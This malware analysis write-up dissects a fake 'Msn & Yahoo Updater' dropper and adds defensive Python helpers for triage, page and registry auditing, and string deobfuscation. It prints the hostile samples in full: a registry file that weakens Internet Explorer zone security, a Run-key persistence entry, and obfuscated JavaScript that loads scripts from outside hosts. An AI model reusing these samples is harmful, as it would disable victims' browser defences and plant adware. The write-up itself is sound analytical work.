Malware Analysis
Randy Armknecht – http://www.rarmknecht.com
October 2005

1. What is a .cmd extension? On which systems would this file extension work?

It's an executable extension for files that will be run by the cmd.exe interpreter on Windows NT and up machines. CMD files do NOT start with the bytes 0x4D5A like Win32/PE .exe files do. Typically, and as is the case with this malware, the .cmd file is an ASCII file that is run as a script by the interpreter.

2. Did you check the MD5 of the unzipped binary? Does it match?

I did and it matches as seen below:

C:\Malware\GroundZero\pbueno\quiz3>md5 BoOtIoS2.exe-e50e87ad5d34cf8d16d01447821d629d
E50E87AD5D34CF8D16D01447821D629D BoOtIoS2.exe-e50e87ad5d34cf8d16d01447821d629d

pbueno's  e50e87ad5d34cf8d16d01447821d629d
mine      E50E87AD5D34CF8D16D01447821D629D

3. Is it packed? If yes, which packer was used?

I ran the strings command below and believe that the output shows it to be packed with UPX and a WinRAR Self Extracting Executable.

Strings v2.2
Copyright (C) 1999-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

ASKNEXTVOL
RD1xt
ASKNEXTVOL
GETPASSWORD1
LICENSEDLG
RENAMEDLG
REPLACEFILEDLG
STARTDLG
DVCLAL
ccpp
MZP
This program must be run under Win32
UPX0
UPX1
.rsrc
1.20
UPX!
SVW
…
name="Roshal.WinRAR.WinRAR"
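As an added illustration of the two checks made in questions 1 and 3 (this is example code written for this page, not part of the original write-up or the author's tooling), the Python below parses a PE section table and reports UPX-style section names, then scans the image for the WinRAR SFX manifest string seen in the strings output. The .cmd text and the PE image it runs on are constructed here for the example; the real BoOtIoS2.exe is not reproduced.

```python
import struct

# Constructed sample inputs for this example (not the analysed BoOtIoS2.exe):
# a .cmd script, and a minimal PE image whose section table uses the
# UPX0/UPX1/.rsrc names seen in the strings output above.
CMD_SAMPLE = b"@echo off\r\necho Updating Windows Shell Files\r\nexit\r\n"


def build_fake_pe(section_names, trailer=b""):
    """Build the smallest PE layout the parser below needs: a DOS stub with
    e_lfanew, the PE signature, a COFF header and one 40-byte section header
    per name. Only the fields the parser reads are filled in."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0 here), Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + sections + trailer


def pe_section_names(data):
    """Return the section names of a PE image, or None if data is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":          # no 0x4D5A signature
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size                   # first section header
    names = []
    for i in range(num_sections):
        off = table + 40 * i
        if off + 40 > len(data):                       # truncated table
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("latin-1"))
    return names


def triage(data):
    """Classify a sample the way questions 1 and 3 do: is it a PE at all,
    does the section table look UPX-packed, and does the image carry the
    WinRAR SFX manifest string?"""
    names = pe_section_names(data)
    if names is None:
        head = data[:512]
        is_text = all(b in b"\r\n\t" or 32 <= b < 127 for b in head)
        return {"kind": "script/text" if is_text else "unknown",
                "sections": [], "upx": False, "winrar_sfx": False}
    return {"kind": "pe",
            "sections": names,
            "upx": any(n.startswith("UPX") for n in names),
            "winrar_sfx": b"Roshal.WinRAR" in data}


if __name__ == "__main__":
    pe = build_fake_pe([b"UPX0", b"UPX1", b".rsrc"], b'name="Roshal.WinRAR.WinRAR"')
    print(triage(CMD_SAMPLE))
    print(triage(pe))
```

Section names and manifest strings are only hints: a packer can rename its sections and a dropper can omit the manifest, so a "no" from this check does not prove a file is unpacked, while a "yes" is a good reason to unpack before looking at strings again.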
4. What is this piece of malware claiming to be?

By reading the SFX Comments section we can see that the malware is claiming to be an updater for MSN and Yahoo. Inside is a .cmd file.

;The comment below contains SFX script commands
Path=.%systemroot%
SavePath
Setup=msnupdater.cmd
Silent=1
Overwrite=1
Title=Msn & Yahoo Updater
Text
{
Updater for Msn and Yahoo Home pages
}
License=Home Page Setup Updater
{
Msn and Yahoo Page updater
}

5. Please describe the process by which this malware will try to get installed on the system.

From the SFX section it looks like the malware will copy msnupdater.cmd to %SYSTEMROOT%. The Silent flag is set so it will not display any graphical notification to the user that it happened. Also, the Overwrite flag is set, so if the file already exists it will be overwritten; a possible way for the malware to update older versions of itself? After the file has been copied it will be executed.

Thanks to FileMon we can see the cmd file being copied here:

After that file is created it creates yahoohomepage.html

Then it creates what looks to be a registry file 2377.reg
After 2377.reg it creates 5577.reg and msnhomepage.html

Now that all the files it needs to do its evil bidding are in place, it uses cmd.exe to execute both msnupdater.cmd and regedit.exe

Regedit then loads the two previously copied down .reg files and imports them
After that it opens Internet Explorer and loads msnhomepage.html

After closing that IE window it then relaunches IE and displays the yahoohomepage.html file

What it displays is shown below

After closing the Yahoo IE window the .cmd file finishes up and closes
6. After some investigation on a machine that had this malware installed, it was verified that the machine was trying to access something related to "*msn*" and "*yahoo*"... Does this malware have something to do with it? If so, with which purpose? :-)

I would say absolutely. Especially if the something it was trying to access were msnhomepage.html or yahoohomepage.html. Let's take a look at those files, shall we?

msnhomepage.html

<html>
<title> Welcome to Msn.com </title>
<meta http-equiv="refresh" content="20;url=http://www.razor-radio.us">
<body>
Standby Loading Msn.com .......
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a372a171/a770ab73.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</body>
</html>

We can see that the only purpose of this page is to first load a JavaScript file from static.windupdates.com. After 20 seconds it refreshes the page to display www.razor-radio.us. The machine that the malware executed on doesn't have an internet connection, so I grab the a770ab73.js file using curl on a *nix box.
We'll take a more detailed look at the javascript and website later.

yahoohomepage.html

<html>
<title> Welcome to Yahoo.com </title>
<meta http-equiv="refresh" content="115;url=http://www.yahoo.com">
<body>
Standby Loading Yahoo.com ...........................................
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a376ab73/a776a174.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
<!-- AUTO_PROMPT AD START -->
<script language=JavaScript type=text/JavaScript src=http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=0&delayload=10&account_id=159080&recurrence=always&adid=a1111819823&event_type=onload&signature=adult></script>
<!-- AUTO_PROMPT AD END -->
</body>
</html>

We can see here that this grabs two javascript files, one from static.windupdates.com like the msnhomepage.html file and another one from install.xxxtoolbar.com. These files were also grabbed using curl on a *nix box. One improvement over the msnhomepage.html file is that after 115 seconds it reloads the page with yahoo.com. Hey, at least this time it attempts to look legit :)
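An added example, not part of the author's analysis: a small stdlib-only Python extractor that pulls the external script sources and the meta-refresh target out of the two dropped pages above, so the hosts they reach (static.windupdates.com, install.xxxtoolbar.com, www.razor-radio.us) can be listed for blocking or log hunting without rendering the pages. The two HTML documents embedded in it are the ones quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The two dropped pages exactly as quoted in the analysis above.
MSN_HOMEPAGE = """<html>
<title> Welcome to Msn.com </title>
<meta http-equiv="refresh" content="20;url=http://www.razor-radio.us">
<body>
Standby Loading Msn.com .......
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a372a171/a770ab73.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</body>
</html>"""

YAHOO_HOMEPAGE = """<html>
<title> Welcome to Yahoo.com </title>
<meta http-equiv="refresh" content="115;url=http://www.yahoo.com">
<body>
Standby Loading Yahoo.com ...........................................
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a376ab73/a776a174.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
<!-- AUTO_PROMPT AD START -->
<script language=JavaScript type=text/JavaScript src=http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=0&delayload=10&account_id=159080&recurrence=always&adid=a1111819823&event_type=onload&signature=adult></script>
<!-- AUTO_PROMPT AD END -->
</body>
</html>"""


class RefExtractor(HTMLParser):
    """Collect external <script src> values and any <meta http-equiv=refresh>
    redirect (delay in seconds, target URL)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.refresh = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "20;url=http://..." per the pages above
            delay, _, target = a.get("content", "").partition(";")
            target = target.strip()
            if target.lower().startswith("url="):
                target = target[4:].strip()
            self.refresh = (int(delay.strip() or 0), target)


def extract_refs(html):
    """Return the scripts, the refresh redirect and the sorted set of hosts
    that a page would contact when opened."""
    p = RefExtractor()
    p.feed(html)
    p.close()
    hosts = sorted({urlsplit(u).hostname for u in p.scripts} - {None})
    return {"scripts": p.scripts, "refresh": p.refresh, "hosts": hosts}


if __name__ == "__main__":
    for name, page in (("msnhomepage.html", MSN_HOMEPAGE),
                       ("yahoohomepage.html", YAHOO_HOMEPAGE)):
        print(name, extract_refs(page))
```

The refresh target is kept separately from the script hosts because it tells you what the victim sees (a radio site, then yahoo.com) while the script hosts are where the actual payload comes from; both belong in the indicator list, but only the latter are worth alerting on.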
7. On the same machine, it was observed that some registry entries were messed up... Again, does this malware have something to do with it? If so, why?

Absolutely, as mentioned in my response to question 5 two .reg files are copied into the %SYSTEMROOT% directory and then imported with regedit. We can also verify this by looking at the source of msnupdater.cmd seen below:

@echo off
echo Updating Windows Shell Files
REGEDIT.EXE /S 2377.reg
REGEDIT.EXE /S 5577.reg
echo Updating Windows Shell Files.....
msnhomepage.html
echo Updating Windows Shell Files........
yahoohomepage.html
echo Updating Windows Shell Files...........
echo Updating Windows Shell Files..............
echo Updating Windows Shell Files is now Complete.
exit

Let's take a look at what these registry files do…

2377.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000

We can see that it modifies several of the Internet Zone settings in IE.
Using http://support.microsoft.com/?kbid=182569 we can see that this registry file does the following:

Value  Setting
-----  -----------------------------------------------------------------------
1001   Download signed ActiveX controls
1004   Download unsigned ActiveX controls
1200   Run ActiveX controls and plug-ins
1201   Initialize and script ActiveX controls not marked as safe
1400   Active scripting
1406   Access data sources across domains
1606   Userdata persistence
1607   Navigate sub-frames across different domains
1A04   Don't prompt for client certificate selection when no certificates or only one certificate exists

The last entry in that file specifies that any website using http as its protocol should be treated as zone 0, or Local. Obviously, a very bad thing.

5577.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SYSTRAY"="C:\\UNMT.EXE"

This entry sets the machine to run the program UNMT.EXE each time a user logs on with a description of SYSTRAY. What I find odd is that this file does not exist. Maybe that file is downloaded by the javascript which we're just about to get to.

8. Please describe how this malware tries to install software (and which) on the machine...

The initial install creates the two html files, two reg files, and the msnupdater.cmd file. The cmd file runs by first updating the registry settings of IE and adds a program to run at user login. Next the webpages are loaded. We've examined the cmd file and reg files previously, along with the base code of the html files. Now we'll take a look at the javascripts that the webpages run.

From the first webpage we saw that it executes a770ab73.js.
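Before moving on to the scripts, here is an added checker for the two .reg files quoted above (example code written for this page, not the author's tooling). It maps each Internet Settings zone value to its KB 182569 name and flags everything the file sets to 0, which for these URL actions means "enable" (1 is "prompt", 3 is "disable"), and separately flags any protocol that ProtocolDefaults maps to zone 0. The 2377.reg text embedded below is the listing above with its backslashes restored.

```python
import re

# 2377.reg as listed above (backslashes restored).
REG_2377 = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000
"""

# URL action names from the KB 182569 table quoted above.
URL_ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
    "1400": "Active scripting",
    "1406": "Access data sources across domains",
    "1606": "Userdata persistence",
    "1607": "Navigate sub-frames across different domains",
    "1A04": "Don't prompt for client certificate selection",
}
ZONES = {0: "Local Machine", 1: "Local intranet", 2: "Trusted sites",
         3: "Internet", 4: "Restricted sites"}
# Meaning of the dword for these URL actions.
POLICY = {0: "enable", 1: "prompt", 3: "disable"}

ZONE_KEY = re.compile(r"\\Internet Settings\\Zones\\(\d)$", re.I)
PROTO_KEY = re.compile(r"\\Internet Settings\\ZoneMap\\ProtocolDefaults$", re.I)


def parse_reg(text):
    """Yield (key, value_name, data) triples from a Regedit 5.00 export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            yield key, name.strip('"'), data


def dword(data):
    """Decode a 'dword:xxxxxxxx' value, or None for other data types."""
    return int(data[len("dword:"):], 16) if data.startswith("dword:") else None


def audit_zone_settings(text):
    """Return (zone, value, description, policy) for every URL action the file
    sets to 'enable', plus every protocol it maps to zone 0 (Local Machine)."""
    findings = []
    for key, name, data in parse_reg(text):
        val = dword(data)
        zone = ZONE_KEY.search(key)
        if zone and name.upper() in URL_ACTIONS and val == 0:
            findings.append((ZONES[int(zone.group(1))], name.upper(),
                             URL_ACTIONS[name.upper()], POLICY[val]))
        elif PROTO_KEY.search(key) and val == 0:
            findings.append(("ProtocolDefaults", name,
                             f"{name}: URLs mapped to zone 0 ({ZONES[0]})", "enable"))
    return findings


if __name__ == "__main__":
    for zone, value, desc, policy in audit_zone_settings(REG_2377):
        print(f"{zone:16} {value:5} {policy:7} {desc}")
```

Run against a live system the same logic works on a `reg export` of HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, which is a quick way to confirm on a suspect box whether the Internet zone (3) has had ActiveX and cross-domain data access silently switched to "enable".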
The a770ab73.js file looks like this:

/*T5gRxPmT LQ8N19 Yo Hs4K*/
var _aT8;var _20S;var _xEN=document;var _hL4;var _hCK;var _fRO;var _nMp=String;var _x5H;var _EzP;var _gQU;var _YJN;var _qR2;var _5xj=_nMp.prototype;var _dNK;var _EoB;var _jHO;var _ehN;var _e6q;var _7w1;var _9o5;var _Z6h;var _zP2;var _pG0;var _ODd;_5xj._hCK=_5xj.slice;
/*V1ZBI3sc wSZFB7zhkjk HEo bS 5yiz8 _P0nRO Mcl5_9ea*/
function _Z6h(_XjQ){_xEN.write("Axhw".slice(5)+"lsw#odqjxdjh@*MdydVfulsw*#w|sh@*wh{w2mdydvfulsw*#vuf@*".slice(3)+_rCz+_XjQ+".EC6zj".slice(7)+"ulswA".slice(3));}
function _g8A(_XDG,_hCK){if(_hCK){return this._hCK(_XDG,_hCK);}var _L1b;var _T0g;var _RDA="";for(_L1b=0; _L1b<this.length; _L1b++){_T0g=this.charCodeAt(_L1b)-_XDG;if(_T0g<32){_T0g=127-(32-_T0g);}_RDA+=_nMp.fromCharCode(_T0g);}return _RDA;};
_5xj.slice=_g8A;
_dNK="569ddbcd2297775:53b7cb36g1c9588c473d9bg:9fec43gefcd84:d8cb5498b7e63bb427dg8287edgb61;444:77764:4947484374727444724:76494276434:7572767448414847774274".slice(1);_fRO=1;_7w1="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4}un4nsxyfqq3}un".slice(5);_YJN=0;_EoB="\"m{".slice(8);_ODd="q}}yC88|}j}rl7!rwm~ymj}n|7lxv8y{xvy}|8|y;8|}ny|h ;7|!o".slice(9);_e6q=3;
var _821="iuuq;00qvcmjd/xjoevqebuft/dpn0mphhjoh3/qiq".slice(1);var _WAH="nzzv@55v{hroi4}otj{vjgzky4ius5vuve{tjkx4vnv".slice(6);_x5H="Dmjdl!ZFT!up!dpoujovf".slice(1);_ehN="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4of{f4gwnilj3ofw".slice(5);
_9o5="tuzoikZk~zC_u{1s{yz1lurru}1yzkvy17+8I181gtj191zu1giikyy1znk1su|oky,xkzx SymC_u{1s{yz1lurru}1yzkvy17+8I181gtj191zu1giikyy1znk1su|oky,yozkTgskCLxkk1Su|ok1Giikyyeeeee1Iroiq1_KY131Ol1 u{1gmx444,yozkV{hroynkxCSkjog1Giikyy,znkskC}nozk,grvngC6,rumuVgznC,rumuYo!kCrgxmk,iruykHztCzk~z".slice(6);
_gQU="o{{wA66z{h{pj5~puk|wkh{lz5jvt6jhi6TlkphHjjlzz6pl6iypknl4j@5jhi".slice(7);_zP2="rqordg".slice(3);_jHO="Dmjdl!ZFT!up!dpoujovf".slice(1);_hL4=1;var _rCz="jvvr<11uvcvke0ykpfwrfcvgu0eqo1rtqorvu1lu1".slice(2);_qR2=1;_20S=0;_pG0=0;
_p_sf=_9o5;_p_ry=_e6q;_p_lu=_821;_p_xu=_7w1;_p_cl=_aT8;_p_cd=_20S;_p_sm=_ODd;_p_ws=_Z6h;_p_pu=_EoB;_p_pr=_dNK;_p_cr=_hL4;_p_dl=_YJN;_p_ju=_ehN;_p_cm=_x5H;_p_ct=_fRO;_p_rm=_jHO;_p_cp=_EzP;_p_pl=_WAH;_p_lf=_qR2;_p_cu=_gQU;
_Z6h("joju/kt".slice(1));
/*uy J 8s9-oYlQRYYmYjWczG*/

Sure looks nasty, but I wrote a quick little html page that will output the results of the file to a textarea on a webpage. From that we can see that all it really does is write the following to the document object.
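An added Python reimplementation (written for this page, not the author's HTML page or the script's own code) of the trick the script relies on: `_g8A` replaces String.prototype.slice with a routine that subtracts its argument from every character code and wraps anything that falls below 32, so every `"literal".slice(n)` in the file is a shifted string. Applying the same arithmetic statically recovers the plaintext without running the script in a browser, and concatenating the four fragments that `_Z6h` writes reproduces its output. The excerpt it runs on is a few statements lifted from the listing above.

```python
import re


def unslice(s, shift):
    """Reproduce the script's replacement for String.prototype.slice: every
    character code is lowered by `shift`; a result below 32 wraps to the top
    of printable ASCII exactly as the loop in _g8A does (127 - (32 - t))."""
    out = []
    for ch in s:
        t = ord(ch) - shift
        if t < 32:
            t = 127 - (32 - t)
        out.append(chr(t))
    return "".join(out)


# Matches a "literal".slice(n) pair; the literal may contain \" escapes.
SLICE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"\.slice\((\d+)\)')


def decode_all(js):
    """Return (encoded, shift, decoded) for every "literal".slice(n) in js."""
    results = []
    for lit, n in SLICE_RE.findall(js):
        lit = lit.replace('\\"', '"')
        results.append((lit, int(n), unslice(lit, int(n))))
    return results


def rebuild_writer_output(name, base):
    """Assemble what _Z6h(name) writes into the document, using the same four
    encoded fragments the function concatenates around _rCz + name."""
    return (unslice("Axhw", 5)
            + unslice("lsw#odqjxdjh@*MdydVfulsw*#w|sh@*wh{w2mdydvfulsw*#vuf@*", 3)
            + base + name
            + unslice(".EC6zj", 7)
            + unslice("ulswA", 3))


# Constructed excerpt: statements copied from a770ab73.js above.
SAMPLE = r'''var _821="iuuq;00qvcmjd/xjoevqebuft/dpn0mphhjoh3/qiq".slice(1);
_x5H="Dmjdl!ZFT!up!dpoujovf".slice(1);
_7w1="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4}un4nsxyfqq3}un".slice(5);
var _rCz="jvvr<11uvcvke0ykpfwrfcvgu0eqo1rtqorvu1lu1".slice(2);
_Z6h("joju/kt".slice(1));'''

# The value of _rCz, the base URL that _Z6h prepends to the script name.
BASE = unslice("jvvr<11uvcvke0ykpfwrfcvgu0eqo1rtqorvu1lu1", 2)


if __name__ == "__main__":
    for enc, n, dec in decode_all(SAMPLE):
        print(f"slice({n}): {enc!r} -> {dec!r}")
    print(rebuild_writer_output(unslice("joju/kt", 1), BASE))
```

Because the decoding is pure string arithmetic, it does not depend on `navigator`, `document` or anything else the browser supplies, so it works on a script that would otherwise stall waiting for the environment; what it cannot do is tell you which branch the script would take at run time, only what every string it might use says.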
<script language=JavaScript type=text/javascript src=http://static.windupdates.com/prompts/js/init.js></script>

Init.js looks like the following:

/*KN1FccO*/
var _G0C=_p_pu;var _S0K=document;var _Y0C=_p_ws;var _B0b=":>JM?@AB6LMK=6=@N:6JBMJ6BB;NNAN?KJM?".slice(9);var _q0c;var _V0S=_p_pr;var _g0e=escape;var _n0C=navigator;var _d0T;var _T0l=parseInt;var _e0c=_p_lu;var _i0o=true;var _R0p;var _10T;var _M0J=["SkjogGii^".slice(6),"RjinfFhhjxx".slice(5),"SkjogMgzk}g ^".slice(6),"NfejbHbufxbz".slice(1)];var _d0z=false;var _E0a;var _F0H=_p_cp;var _W0v="\n";var _Z0P=_S0K.location.href.substr(0,150);var _90h={on:_d0z,ov:_d0z,omv:_d0z,ovn:_d0z,bn:_d0z,bv:_d0z,bmv:_d0z,str:_d0z};
function _F07(){_h0x();if(_90h.bn=="ntjf".slice(1)&&_90h.on==" qv".slice(8)){_S0K.write("Axhw".slice(5)+"qx|(tivo}iomE/^J{kzqx|/(|\"xmE/|m!|7~j{kzqx|/F".slice(8)+_W0v+"N}vk".slice(8)+"zout&jeG^.g^".slice(6)+"Tgsk/".slice(6)+_W0v+"\"\"Qp\"Gttqt\"Tguwog\"Pgzv".slice(2)+_W0v+"%%HwjfyjTgojhy-f]".slice(5)+"Uhtl0".slice(7)+_W0v+"((lgI`Ez}m".slice(8)+_W0v+"$$Mj$Ivv@B4$Xlir".slice(4)+_W0v+"\"\"\"\"faCZ?Hcnug".slice(2)+_W0v+"%%Jsi%Nk".slice(5)+_W0v+"Foe!Gvo".slice(1)+"gxmsr".slice(4)+_W0v+"B5yix".slice(6)+"mtxB".slice(4));}_20I("klw".slice(3));_M0g((_G0C=="\"m{".slice(8)),(_F0H==1),_o0f());}
function _h0x(){var _904=_n0C.userAgent.toLowerCase();var _40h;var _B0j;if(_n0C.appMinorVersion){_40h=_n0C.appMinorVersion.toLowerCase();}else{_40h="";}var _704={firefox:["or{nox\"".slice(9)],konqueror:["swvy}mzwz".slice(8)],opera:["xyn{j".slice(9)],safari:["tbgbsj".slice(1)],netscape:["rixwgeti:".slice(4),"pgvuecrg".slice(2),"su!orrg".slice(6)],msie:["pvlh".slice(3)],mozilla:["tx".slice(2)]};var _T0a={win:{win2k3:["!rwmx!|)w})>7;".slice(9)],winxp:["zlqgrzv#qw#814".slice(3),"ykpfqyu\"zr".slice(2)],win2k:["~pukv~zu{<57".slice(7),"zlqgrzv#5333".slice(3)],winnt:["~puu{".slice(7),"}otju}y&tz".slice(6)],winme:["zlq#<{#71<3".slice(3)],win98:["}ot?>".slice(6),"~pukv~z@?".slice(7)],win95:["ykp;7".slice(2),"}otju}y&?;".slice(6)],win31:["!rwmx!|)<7:".slice(9),"}ot7<".slice(6),"{mrhs{w$5:1fmx".slice(4),"38dkv".slice(2)],win:["zlqgrzv".slice(3),"ykp".slice(2)]},os2:{os2:["uy58".slice(6),"qju5 mjm!xtwzmz".slice(8)]},mac:{osx:["sgi&uy&~".slice(6)],mac9:["qeg$=2".slice(4)],mac:["vjl".slice(9)]},unix:{linux:["ot{~".slice(6)],unix:["wyrsw".slice(4),"qzq!".slice(8),"ow4| ".slice(7),"jr\"".slice(9),"tdp".slice(1),"yrm|cw}wxiqcz".slice(4),"qfu".slice(3),"zmtqiv|}vq!".slice(8),"mnl".slice(9),"bmqib".slice(1),"ypxvm|".slice(4),"xnsn}".slice(5),"izk".slice(7)," 88".slice(7)]}};var _a09=["|y:".slice(9),"ur4".slice(2),"yv9".slice(6),"{x<".slice(8),"|y>".slice(9),"zw=".slice(7)];for(_R0p in _704){if(_904.indexOf(_R0p)!=-1){_90h.bn=_R0p;break;}}if(!_90h.bn){_90h.bn="sxliv".slice(4);}var _l0m=_d0z;for(_R0p in _704[_90h.bn]){_d0T=_704[_90h.bn][_R0p];_l0m=_904.indexOf(_d0T);if(_l0m!=-1){break;}}if(_90h.bn=="su!orrg".slice(6)&&_l0m==-1){_90h.bn="sjyxhfuj".slice(5);for(_R0p in _704[_90h.bn]){_d0T=_704[_90h.bn][_R0p];_l0m=_904.indexOf(_d0T);if(_l0m!=-1){break;}}}new RegExp("*]/02/;c/|_-+".slice(2)).exec(String(_904.substr(_l0m+_d0T.length+1)));_E0a=RegExp.$1;if(_90h.bn=="|joj{r".slice(9)){_90h.bv=_T0l(_E0a / 100);if(_90h.bv){_90h.bmv=_E0a.substr(String(_90h.bv).length,10);}else{_90h.bmv=_T0l(_E0a-(100 * _90h.bv));}}else if(_90h.bn!="v{oly".slice(7)){_l0m=_E0a.indexOf(".");if(_l0m!=-1){_90h.bmv=_E0a.substr(_l0m+1,10);}else{_90h.bmv=0;}_90h.bv=_T0l(_E0a);}if(isNaN(_90h.bv)||!_90h.bv){_90h.bv=0;}if(!_90h.bmv){_90h.bmv=0;}for(_R0p in _T0a){for(_q0c in _T0a[_R0p]){for(_10T in _T0a[_R0p][_q0c]){if(_904.indexOf(_T0a[_R0p][_q0c][_10T])!=-1){_90h.on=_R0p;_90h.ov=_q0c;break;}}if(_90h.on){break;}}if(_90h.on){break;}}if(_90h.on&&_90h.ov){for(_R0p in _a09){if(_40h.indexOf(_a09[_R0p])!=-1){_90h.omv=_a09[_R0p];_90h.ovn=_R0p+1;break;}}}else{_90h.on="tymjw".slice(5);_90h.ov="uznkx".slice(6);}if(!_90h.omv){_90h.omv="sxliv".slice(4);_90h.ovn=0;}if(_90h.bn=="qwmi".slice(4)&&_90h.ov=="!rw\"y".slice(9)&&_90h.ovn>=2){_B0j="mshzo".slice(7);}else{_B0j="ri~i{kzqx|".slice(8);}_90h.str=_90h.bn+":"+_90h.bv+":"+_90h.bmv+":"+_90h.on+":"+_90h.ov+":"+_90h.omv+":"+_B0j;}
function _o0f(){var _K0e="0kpuvcnngt".slice(2);if(_90h.bn=="syok".slice(6)&&_90h.on=="}ot".slice(6)){for(_R0p in _M0J){if(d_AX(_M0J[_R0p]+_K0e)){return _M0J[_R0p];}}}return _d0z;}
function _20I(_F0E){if(_F0E=="fqypnqcf".slice(2)){_S0K.write("E|l{".slice(9)+"lsw#odqjxdjh@*MdydVfulsw*#w|sh@*wh{w2mdydvfulsw*#vuf@*".slice(3)+_e0c+"CtA".slice(4)+_g0e(_V0S)+",hC".slice(6)+_g0e(_90h.str)+"/|F".slice(9)+_g0e(_Z0P)+"0GE8|l".slice(9)+"ypw{E".slice(7));}}
function _M0g(_G0o,_r02,_10d){if(!_10d){_20I("epxompbe".slice(1));}if(_G0o){_Y0C("wvwf|ukly5qz".slice(7));}if(!_10d||_r02){var _c0q;if(_r02){_c0q="qspufdu".slice(1);}else{_c0q="wyvtw{".slice(7);}if(_90h.bn=="pvlh".slice(3)&&_90h.on==" qv".slice(8)){_c0q+="eok".slice(6);if(_90h.ov=="{mr|t".slice(4)&&_90h.ovn>=2||_90h.ov=="zlq5n6".slice(3)){_c0q+="c|twt6".slice(4);}else{_c0q+="bzlq".slice(3);}}else{_c0q+="dijkfzqy".slice(5);}if(_c0q=="tvsqtxchijeypx".slice(4)){return;}_c0q+="/kt".slice(1);_Y0C(_c0q);}}
_i_br=_90h;_i_da=_o0f;_i_ci=_B0b;_F07();
/*NBPZPuuYyrnyO2CDIiHdd9cN-*/
